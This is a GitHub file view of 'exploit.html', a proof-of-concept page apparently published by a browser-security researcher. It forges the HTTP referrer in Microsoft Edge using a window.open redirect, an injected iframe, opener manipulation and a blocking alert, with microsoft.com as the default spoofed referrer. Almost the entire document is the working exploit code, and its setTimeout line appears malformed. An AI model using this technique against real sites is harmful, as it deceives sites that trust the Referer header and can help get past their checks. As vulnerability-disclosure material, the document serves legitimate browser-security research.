-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.html
29 lines (26 loc) · 1.01 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!doctype html>
<html lang="en">
<head><title>Edge Referrer Spoof II</title></head>
<body>
<h2>Edge Referrer Spoof II</h2>
Referrer to Spoof: <input id="spoofed_referer" value="https://www.microsoft.com/" type="text" size="50"/>
<br /><br />
Fooled WebSite: <input id="fooled_website" value="https://www.whatismyreferer.com" type="text" size="50"/>
<br /><br />
<input type="button" value="Spoof Me" onclick="spoofMe()" />
<script>
function spoofMe()
{
var win = window.open("redir.php?URL=" + spoofed_referer.value);
var ifr = win.document.createElement("iframe");
win.document.appendChild(ifr);
win[0].opener = win;
win[0].setTimeout("alert('Thread blocker. \\nClose me once the site starts loading behind.\\nThen we will automatically redirect with the forged referrer');opener.location='"+fooled_website.value +"'";);
}
</script>
<br /><br />
<hr />
<a href="https://www.brokenbrowser.com">Broken Browser</a><br /><br />
Questions? Ping me at <a href="https://twitter.com/magicmac2000">@magicmac2000</a><br />
</body>
</html>